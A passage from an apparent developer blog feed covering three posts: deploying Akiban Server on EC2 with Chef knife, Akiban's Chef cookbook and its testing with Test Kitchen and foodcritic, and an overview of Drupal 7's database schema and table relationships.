&lt;p&gt;Now, whenever we are in the &lt;code&gt;akiban-chef-repo&lt;/code&gt; directory, the &lt;code&gt;knife&lt;/code&gt; utility will connect to the Opscode platform. To verify this, lets list out the current clients our hosted chef server knows about:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt; knife client list
&lt;span class='go'&gt;  akiban-validator&lt;/span&gt;
&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Next, &lt;code&gt;knife&lt;/code&gt; needs to be configured with the correct AWS credentials. This is done by adding the following 2 lines to the &lt;code&gt;knife.rb&lt;/code&gt; file in the &lt;code&gt;~/akiban-chef-repo/.chef&lt;/code&gt; directory:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;&lt;span class='n'&gt;knife&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='ss'&gt;:aws_access_key_id&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt;     &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;Your AWS Access Key&amp;quot;&lt;/span&gt;
&lt;span class='n'&gt;knife&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='ss'&gt;:aws_secret_access_key&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;Your AWS Secret Access Key&amp;quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;After adding these credentials the EC2 instances associated with the AWS account can be viewed:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt; knife ec2 server list
&lt;span class='go'&gt;Instance ID  Public IP       Private IP      Flavor      Image         SSH Key        Security Groups  State  &lt;/span&gt;
&lt;span class='go'&gt;i-1bcb4f77   50.16.188.89    10.112.233.119  t1.micro    ami-548c783d  akibanweb      AkibanWeb        running&lt;/span&gt;
&lt;span class='go'&gt;i-f814fe97                                   m1.large    ami-548c783d  akibanxxx      akibanxxx        stopped&lt;/span&gt;
&lt;span class='go'&gt;i-39474442   23.20.173.62    10.64.5.187     t1.micro    ami-aecd60c7  designpartner  designpartner    running&lt;/span&gt;
&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h1 id='akiban_cookbook'&gt;Akiban Cookbook&lt;/h1&gt;

&lt;p&gt;chef is now configured to work with the appropriate AWS account. Now we want to bootstrap an EC2 instance with the latest early developer release of Akiban. I covered that we developed a cookbook for Akiban in my &lt;a href='http://posulliv.github.com/akiban/2012/08/22/akiban-chef/'&gt;previous post&lt;/a&gt; and we place that in our chef repository as so:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;knife cookbook site install akibanserver&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This downloads the latest release of the &lt;a href='http://community.opscode.com/cookbooks/akibanserver'&gt;akibanserver cookbook&lt;/a&gt; from the opscode community site. Next, we want to upload this cookbook to our hosted chef server:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;cd ~/akiban-chef-repo&lt;/span&gt;
&lt;span class='go'&gt;knife cookbook upload akibanserver --include-dependencies&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can verify this cookbook (and its dependencies) are now available:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt; knife cookbook list
&lt;span class='go'&gt;  akibanserver   0.1.0&lt;/span&gt;
&lt;span class='go'&gt;  apt            1.4.8&lt;/span&gt;
&lt;span class='go'&gt;  openssl        1.0.0&lt;/span&gt;
&lt;span class='go'&gt;  postgresql     1.0.0&lt;/span&gt;
&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h1 id='create_and_verify_ec2_instance'&gt;Create and Verify EC2 Instance&lt;/h1&gt;

&lt;p&gt;We are now ready to create an EC2 instance and have it bootstrap itself and install the Akiban developer edition! Feel free to pick any CentOS or Ubuntu AMI you wish for the command below:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;knife ec2 server create \&lt;/span&gt;
&lt;span class='go'&gt;--run-list akibanserver \&lt;/span&gt;
&lt;span class='go'&gt;--image ami-2d4aa444 \&lt;/span&gt;
&lt;span class='go'&gt;--flavor m1.small \&lt;/span&gt;
&lt;span class='go'&gt;--groups akiban \&lt;/span&gt;
&lt;span class='go'&gt;--ssh-key akiban \&lt;/span&gt;
&lt;span class='go'&gt;--identity-file ~/.ssh/akiban.pem \&lt;/span&gt;
&lt;span class='go'&gt;--ssh-user ubuntu \&lt;/span&gt;
&lt;span class='go'&gt;--node-name akibantest \&lt;/span&gt;
&lt;span class='go'&gt;--availability-zone us-east-1a&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;After kicking the above, you will see lots of output! Assuming the command finishes successfully, to verify the server is created, first we check that it appears in the server list output from EC2:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt; knife ec2 server list
&lt;span class='go'&gt;Instance ID  Public IP       Private IP      Flavor      Image         SSH Key        Security Groups  State  &lt;/span&gt;
&lt;span class='go'&gt;i-1bcb4f77   50.16.188.89    10.112.233.119  t1.micro    ami-548c783d  akibanweb      AkibanWeb        running&lt;/span&gt;
&lt;span class='go'&gt;i-f814fe97                                   m1.large    ami-548c783d  akibanxxx      akibanxxx        stopped&lt;/span&gt;
&lt;span class='go'&gt;i-39474442   23.20.173.62    10.64.5.187     t1.micro    ami-aecd60c7  designpartner  designpartner    running&lt;/span&gt;
&lt;span class='go'&gt;i-fd17d380   184.72.187.226  10.34.106.161   m1.small    ami-2d4aa444  akiban         akiban           running&lt;/span&gt;
&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The chef server should also list this instance as a node now:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt; knife node list
&lt;span class='go'&gt;akibantest&lt;/span&gt;
&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The instance is now available and we can log on and start using the akiban server:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt; ssh -i ~/.ssh/akiban.pem ubuntu@184.72.187.226
&lt;span class='go'&gt;Linux ip-10-34-106-161 2.6.32-305-ec2 #9-Ubuntu SMP Thu Apr 15 04:14:01 UTC 2010 i686 GNU/Linux&lt;/span&gt;
&lt;span class='go'&gt;Ubuntu 10.04 LTS&lt;/span&gt;

&lt;span class='go'&gt;Welcome to Ubuntu!&lt;/span&gt;
&lt;span class='go'&gt; * Documentation:  https://help.ubuntu.com/&lt;/span&gt;

&lt;span class='go'&gt;  System information as of Wed Sep 26 20:28:34 UTC 2012&lt;/span&gt;

&lt;span class='go'&gt;  System load: 0.54             Memory usage: 16%   Processes:       54&lt;/span&gt;
&lt;span class='go'&gt;  Usage of /:  9.3% of 9.92GB   Swap usage:   0%    Users logged in: 0&lt;/span&gt;

&lt;span class='go'&gt;  Graph this data and manage this system at https://landscape.canonical.com/&lt;/span&gt;
&lt;span class='go'&gt;---------------------------------------------------------------------&lt;/span&gt;
&lt;span class='go'&gt;At the moment, only the core of the system is installed. To tune the &lt;/span&gt;
&lt;span class='go'&gt;system to your needs, you can choose to install one or more          &lt;/span&gt;
&lt;span class='go'&gt;predefined collections of software by running the following          &lt;/span&gt;
&lt;span class='go'&gt;command:                                                             &lt;/span&gt;
&lt;span class='go'&gt;                                                                     &lt;/span&gt;
&lt;span class='go'&gt;   sudo tasksel --section server                                     &lt;/span&gt;
&lt;span class='go'&gt;---------------------------------------------------------------------&lt;/span&gt;

&lt;span class='go'&gt;New release &amp;#39;precise&amp;#39; available.&lt;/span&gt;
&lt;span class='go'&gt;Run &amp;#39;do-release-upgrade&amp;#39; to upgrade to it.&lt;/span&gt;

&lt;span class='go'&gt;A newer build of the Ubuntu lucid server image is available.&lt;/span&gt;
&lt;span class='go'&gt;It is named &amp;#39;release&amp;#39; and has build serial &amp;#39;20120913&amp;#39;.&lt;/span&gt;
&lt;span class='go'&gt;*** System restart required ***&lt;/span&gt;
&lt;span class='go'&gt;Last login: Wed Sep 26 20:23:13 2012 from 75-147-9-1-newengland.hfc.comcastbusiness.net&lt;/span&gt;
&lt;span class='gp'&gt;ubuntu@ip-10-212-87-144:~$&lt;/span&gt; psql -h localhost -p 15432 information_schema
&lt;span class='go'&gt;psql (8.4.13, server 8.4.7)&lt;/span&gt;
&lt;span class='go'&gt;Type &amp;quot;help&amp;quot; for help.&lt;/span&gt;

&lt;span class='go'&gt;information_schema=&amp;gt; select * from server_instance_summary;&lt;/span&gt;
&lt;span class='go'&gt;  server_name  | server_version | instance_status |     start_time      &lt;/span&gt;
&lt;span class='go'&gt;---------------+----------------+-----------------+---------------------&lt;/span&gt;
&lt;span class='go'&gt; Akiban Server | 1.4.1.2151     | RUNNING         | 2012-09-26 20:30:04&lt;/span&gt;
&lt;span class='go'&gt;(1 row)&lt;/span&gt;

&lt;span class='go'&gt;information_schema=&amp;gt; &lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h1 id='conclusion'&gt;Conclusion&lt;/h1&gt;

&lt;p&gt;Following the steps in this article, it should be pretty easy to spin up an EC2 instance with Akiban installed on it with chef. We are currently starting work on a cookbook for the Akiban Adapter for MySQL. When that is available, a post detailing how to use that will be posted.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Akiban Server Cookbook for Chef</title>
   <link href="http://posulliv.github.com/2012/08/22/akiban-chef"/>
   <updated>2012-08-22T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/08/22/akiban-chef</id>
   <content type="html">&lt;p&gt;Last week I spent some time putting together a cookbook for Akiban that allows the Akiban Server to be easily deployed in environments where &lt;a href='http://www.opscode.com/chef/'&gt;chef&lt;/a&gt; is used. This cookbook is currently available on &lt;a href='https://github.com/akiban/akiban-server-cookbook'&gt;github&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;This cookbook uses the awesome new tool opscode announced last week - &lt;a href='http://www.opscode.com/blog/2012/08/17/announcing-test-kitchen/'&gt;Test Kitchen&lt;/a&gt;. This makes testing of our cookbook extremely easy for us. Right now, the tests for the Akiban Server cookbook are very similar to the tests developed for the MySQL cookbook. On a system with &lt;code&gt;kitchen&lt;/code&gt; installed, the cookbook can be downloaded and tests run easily by simply running:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;kitchen test&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Running the above results in a virtual machine being downloaded and started using &lt;code&gt;vagrant&lt;/code&gt;. The virtual machine is then provisioned using &lt;code&gt;chef&lt;/code&gt; and the cookbook under test is set up. The Akiban Server cookbook installs the PostgreSQL client (since the Akiban Server speaks the PostgreSQL protocol) and the Akiban Server. The tests run to verify everything is working ok are pretty simple at the moment: some data is loaded in to a single table and a few simple queries are run to make sure the database server is functioning correctly.&lt;/p&gt;

&lt;p&gt;One other item we implemented that was pretty neat was we use the Travis build system to make sure our cookbook adheres to best practices by running &lt;a href='http://acrmp.github.com/foodcritic/'&gt;foodcritic&lt;/a&gt; on every new push to master.&lt;/p&gt;

&lt;p&gt;Test Kitchen and foodcritic together help us to ensure our cookbooks are high quality. Our main goal is to make sure our customers enjoy the easiest deployment process and since we see many people using &lt;code&gt;chef&lt;/code&gt;, we wanted to make sure we integrate well with environments where &lt;code&gt;chef&lt;/code&gt; is in place.&lt;/p&gt;

&lt;p&gt;I plan on doing a webinar in the near future on deploying Akiban Server with chef. In that webinar, I will be able to do some demos of deploying Akiban in EC2 with &lt;code&gt;chef&lt;/code&gt;.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Digging into Drupal's Schema</title>
   <link href="http://posulliv.github.com/2012/08/02/drupal-er-diagram"/>
   <updated>2012-08-02T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/08/02/drupal-er-diagram</id>
   <content type="html">&lt;p&gt;I&amp;#8217;m relatively new to Drupal internals and most of the &lt;a href='http://akiban.com/'&gt;work&lt;/a&gt; I do is on the database side. While searching for information on Drupal&amp;#8217;s schema, I found very little. During my research, I put together an ER diagram of the schema installed by Drupal 7 (D8 is very similar with only 3 extra tables at time of writing) and decided to share my work. Note that the relationships I discuss here are based on the foreign key documentation that exists in core and my understanding of what I believe other relationships could be. Corrections and comments are very much welcome.&lt;/p&gt;

&lt;h1 id='overview'&gt;Overview&lt;/h1&gt;

&lt;p&gt;I&amp;#8217;ll start off by showing my complete ER diagram below. You will see I grouped tables I found to be related in colored boxes. The image below is just meant to give a general overview of the schema. I will be diving into different parts of the schema in this post. I created this diagram using &lt;a href='http://www.mysql.com/products/workbench/'&gt;MySQL Workbench&lt;/a&gt; and the model can be downloaded from &lt;a href='http://posulliv.github.com/misc/latest_drupal_7.mwb'&gt;here&lt;/a&gt; if someone wishes to open this up in Workbench. This &lt;a href='https://gist.github.com/3231183'&gt;gist&lt;/a&gt; also shows the &lt;code&gt;ALTER TABLE&lt;/code&gt; SQL statements that would need to be issued to actually create these foreign keys in MySQL. I would not recommend doing this right now with Drupal as many things would break.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/all_drupal_7_er.png' alt='Full ER Diagram.' /&gt;
&lt;/div&gt;
&lt;p&gt;Without delving into the relationships and details of this diagram, lets first cover some basic details. A stock install of Drupal 7 results in 73 tables being created. 10 of those tables are used for caching purposes:&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Caching Table&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;cache&lt;/td&gt;&lt;td&gt;caches items not separated out into their own cache tables&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;cache_block&lt;/td&gt;&lt;td&gt;the block modules can cache already built blocks here&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;cache_bootstrap&lt;/td&gt;&lt;td&gt;data required during the bootstrap process can be cached in this table&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;cache_field&lt;/td&gt;&lt;td&gt;stores cached field values&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;cache_filter&lt;/td&gt;&lt;td&gt;caches already filtered pieces of text&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;cache_form&lt;/td&gt;&lt;td&gt;caches recently built forms and their storage data&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;cache_image&lt;/td&gt;&lt;td&gt;caches information about image manipulations that are in progress&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;cache_menu&lt;/td&gt;&lt;td&gt;caches router information as well as generated link trees&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;cache_page&lt;/td&gt;&lt;td&gt;caches compressed pages served to anonymous users&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;cache_path&lt;/td&gt;&lt;td&gt;caches path aliases&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;11 tables are created which do not relate to any other tables:&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Table Name&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;actions&lt;/td&gt;&lt;td&gt;stores action information&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;batch&lt;/td&gt;&lt;td&gt;stores details about batches (processes that run in multiple HTTP requests)&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;blocked_ips&lt;/td&gt;&lt;td&gt;stores a list of blocked IP addresses&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;flood&lt;/td&gt;&lt;td&gt;controls the threshold of events, such as the number of contact attempts&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;queue&lt;/td&gt;&lt;td&gt;stores items in queues&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;rdf_mapping&lt;/td&gt;&lt;td&gt;stores custom RDF mappings for user-defined content types&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;semaphore&lt;/td&gt;&lt;td&gt;stores semaphores, locks, and flags&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;sequences&lt;/td&gt;&lt;td&gt;stores IDs&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;system&lt;/td&gt;&lt;td&gt;contains a list of all modules, themes, and theme engines that are or have been installed&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;url_alias&lt;/td&gt;&lt;td&gt;contains a list of URL aliases for Drupal paths&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;variable&lt;/td&gt;&lt;td&gt;stores variable/value pairs created by Drupal core or any other module or theme&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;The 21 tables listed above are self-explanatory and I&amp;#8217;m not going to discuss them any further in this post. They also are independent in that these tables have no relationships with other tables.&lt;/p&gt;

&lt;h1 id='field_related_tables'&gt;Field Related Tables&lt;/h1&gt;

&lt;p&gt;There are 8 tables installed with core related to fields and field storage:&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Table Name&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;field_data_body&lt;/td&gt;&lt;td&gt;stores details about the body field of an entity&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;field_revision_body&lt;/td&gt;&lt;td&gt;stores information about revisions to body fields&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;field_data_comment_body&lt;/td&gt;&lt;td&gt;stores information about comments associated with an entity&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;field_revision_comment_body&lt;/td&gt;&lt;td&gt;stores information about revisions to comments&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;field_data_field_image&lt;/td&gt;&lt;td&gt;stores information about images associated with an entity&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;field_revision_field_image&lt;/td&gt;&lt;td&gt;stores information about revisions to images&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;field_data_field_tags&lt;/td&gt;&lt;td&gt;stores information about tags associated with an entity&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;field_revision_field_tags&lt;/td&gt;&lt;td&gt;stores information about revisions to taxonomy terms/tags associated with an entity&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;While I was initially tempted to have these tables related to &lt;code&gt;node&lt;/code&gt;, that would not really be correct since these tables are related to an entity. In D7, entities can be other objects besides nodes, such as users or comments. The &lt;code&gt;entity_type&lt;/code&gt; column in these tables reflects that reality. These tables can be stored in other storage systems such as &lt;a href='http://drupal.org/project/mongodb'&gt;MongoDB&lt;/a&gt; due to the &lt;a href='http://api.drupal.org/api/drupal/modules%21field%21field.attach.inc/group/field_storage/7'&gt;field storage API&lt;/a&gt; introduced in Drupal 7.&lt;/p&gt;

&lt;p&gt;There are 2 other tables related to fields: &lt;code&gt;field_config&lt;/code&gt; and &lt;code&gt;field_config_instance&lt;/code&gt;. These tables store field configuration information. I believe a row in &lt;code&gt;field_config_instance&lt;/code&gt; cannot (well at least &lt;em&gt;should&lt;/em&gt; not) exist without the correspondong &lt;code&gt;field_id&lt;/code&gt; in the &lt;code&gt;field_config&lt;/code&gt; table. Hence, the one-to-many relationship from &lt;code&gt;field_config&lt;/code&gt; to &lt;code&gt;field_config_instance&lt;/code&gt; is an identifying relationship.&lt;/p&gt;

&lt;h1 id='small_groups_of_tables'&gt;Small Groups of Tables&lt;/h1&gt;

&lt;p&gt;There are a number of groups you will notice in the full ER diagram that are made up of 2 to 3 tables. Zooming in on 4 of those groups, we can see those tables more clearly:&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/small_groups_zoom.png' alt='Zooming in on small groups.' /&gt;
&lt;/div&gt;
&lt;p&gt;One thing you will notice is that some relationships are shown with a solid line whereas others use a dotted line. MySQL Workbench represents identifying relationships with a solid line and non-identifying relationships with a dotted line. If you are unfamiliar with those terms, the standard defintions are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;identifying relationship - the foreign key attribute is part of the child&amp;#8217;s primary key attribute.&lt;/li&gt;

&lt;li&gt;non-identifying relationship - the primary key attributes of the parent must not become primary key attributes of the child.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This &lt;a href='http://stackoverflow.com/questions/762937/whats-the-difference-between-identifying-and-non-identifying-relationships'&gt;stack overflow answer&lt;/a&gt; from &lt;a href='http://karwin.blogspot.com/'&gt;Bill Karwin&lt;/a&gt; contains a good discussion on these topics.&lt;/p&gt;

&lt;p&gt;Now lets discuss those groups in more detail.&lt;/p&gt;

&lt;h2 id='registry_group'&gt;Registry Group&lt;/h2&gt;

&lt;p&gt;I grouped the &lt;code&gt;registry&lt;/code&gt; and &lt;code&gt;registry_file&lt;/code&gt; tables together. These tables are used for implementing the code registry in Drupal. A one-to-many relationship exists from &lt;code&gt;registry_file&lt;/code&gt; to &lt;code&gt;registry&lt;/code&gt; and this relationship is an identifying relationship. A &lt;code&gt;filename&lt;/code&gt; should not appear in the &lt;code&gt;registry&lt;/code&gt; table that is not present in the &lt;code&gt;registry_file&lt;/code&gt; table.&lt;/p&gt;

&lt;h2 id='image_group'&gt;Image Group&lt;/h2&gt;

&lt;p&gt;I grouped the &lt;code&gt;image_styles&lt;/code&gt; and &lt;code&gt;image_effects&lt;/code&gt; tables together. These tables store configuration options for image styles and effects. A one-to-many relationship exists from &lt;code&gt;image_styles&lt;/code&gt; to &lt;code&gt;image_effects&lt;/code&gt; and this relationship is a non-identifying relationship.&lt;/p&gt;

&lt;h2 id='date_format_group'&gt;date_format Group&lt;/h2&gt;

&lt;p&gt;There are three tables about date formats in Drupal. &lt;code&gt;date_format_type&lt;/code&gt; is a lookup table that stores configured date format types. After a stock install of Drupal 7, three date format types exist:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;long&lt;/li&gt;

&lt;li&gt;medium&lt;/li&gt;

&lt;li&gt;short&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A one-to-many relationship exists from this lookup table to both &lt;code&gt;date_formats&lt;/code&gt; and &lt;code&gt;date_format_locale&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;In practice, this would be problematic. For example, a new date format can be created by an adminstrator. In D7, this results in the &lt;code&gt;system_date_format_save&lt;/code&gt; function being called. This function will insert a row in the &lt;code&gt;date_formats&lt;/code&gt; table that will not have a corresponding type (type will be listed as custom).&lt;/p&gt;

&lt;p&gt;You will also notice the &lt;code&gt;locked&lt;/code&gt; column is redundant in the &lt;code&gt;date_formats&lt;/code&gt; table. I submitted a &lt;a href='http://drupal.org/node/1708464'&gt;patch&lt;/a&gt; to change this.&lt;/p&gt;

&lt;h2 id='file_group'&gt;File Group&lt;/h2&gt;

&lt;p&gt;I grouped the &lt;code&gt;file_managed&lt;/code&gt; and &lt;code&gt;file_usage&lt;/code&gt; tables into 1 group. These tables store information about uploaded files and information for tracking where a file is used.&lt;/p&gt;

&lt;p&gt;I believe a 1-to-1 relationship exists from &lt;code&gt;file_managed&lt;/code&gt; to &lt;code&gt;file_usage&lt;/code&gt; and that this is an identifying relationship.&lt;/p&gt;

&lt;h1 id='user_related_tables'&gt;User Related Tables&lt;/h1&gt;

&lt;p&gt;There are quite a few tables that store user related information. Below is a figure where I zoom in on those tables.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/all_user_tables.png' alt='User tables.' /&gt;
&lt;/div&gt;
&lt;p&gt;As you can see, the tables directly associated with users are &lt;code&gt;watchdog&lt;/code&gt;, &lt;code&gt;sessions&lt;/code&gt;, and &lt;code&gt;authmap&lt;/code&gt;. These tables are in a one-to-many relationship from &lt;code&gt;users&lt;/code&gt;. The functionality these tables provide is:&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Table Name&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;authmap&lt;/td&gt;&lt;td&gt;stores distributed authentication mapping&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;sessions&lt;/td&gt;&lt;td&gt;stores information about a users session&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;watchdog&lt;/td&gt;&lt;td&gt;contains logs of all system events&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;There are then two tables that are in a many-to-many relationship with &lt;code&gt;users&lt;/code&gt; that link this table with other groups. One of these is the &lt;code&gt;users_roles&lt;/code&gt; table. This table links &lt;code&gt;users&lt;/code&gt; with &lt;code&gt;role&lt;/code&gt;. The &lt;code&gt;role&lt;/code&gt; table is then in a one-to-many relationship with the &lt;code&gt;role_permission&lt;/code&gt; table. The other many-to-many table is &lt;code&gt;shortcut_set_users&lt;/code&gt;. This table links &lt;code&gt;users&lt;/code&gt; with &lt;code&gt;shortcut_set&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The tables for the menu system are not really related to users but I placed the group close by since the &lt;code&gt;menu_links&lt;/code&gt; table maintains a one-to-many relationship with the &lt;code&gt;shortcut_set&lt;/code&gt; table. While the tables for the menu system do not appear to be related, I do believe a relationship exists there. In particular, I think that the &lt;code&gt;menu_link&lt;/code&gt; table has relationships to both the &lt;code&gt;menu_router&lt;/code&gt; and &lt;code&gt;menu_custom&lt;/code&gt; tables. The &lt;code&gt;router_path&lt;/code&gt; column in &lt;code&gt;menu_links&lt;/code&gt; could reference the &lt;code&gt;router&lt;/code&gt; column in &lt;code&gt;menu_router&lt;/code&gt; and the &lt;code&gt;menu_name&lt;/code&gt; column in &lt;code&gt;menu_links&lt;/code&gt; could reference the &lt;code&gt;menu_name&lt;/code&gt; in the &lt;code&gt;menu_custom&lt;/code&gt; table. Right now however, after a stock install of D7, a row with a menu name that is not present in &lt;code&gt;menu_custom&lt;/code&gt; will be created in &lt;code&gt;menu_links&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The menu system tables and a description of what they do is below.&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Table Name&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;menu_custom&lt;/td&gt;&lt;td&gt;holds definitions for top-level custom menus&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;menu_links&lt;/td&gt;&lt;td&gt;contains the individual links within a menu&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;menu_router&lt;/td&gt;&lt;td&gt;maps paths to various callbacks&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;&lt;br /&gt;
&lt;h1 id='node_related_tables'&gt;Node Related Tables&lt;/h1&gt;

&lt;p&gt;Node is one of the most central concepts in Drupal so as you can imagine, many tables are related to that concept. First off, a high level overview of the tables related to the &lt;code&gt;node&lt;/code&gt; table are shown below.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/all_node_tables.png' alt='Node tables.' /&gt;
&lt;/div&gt;
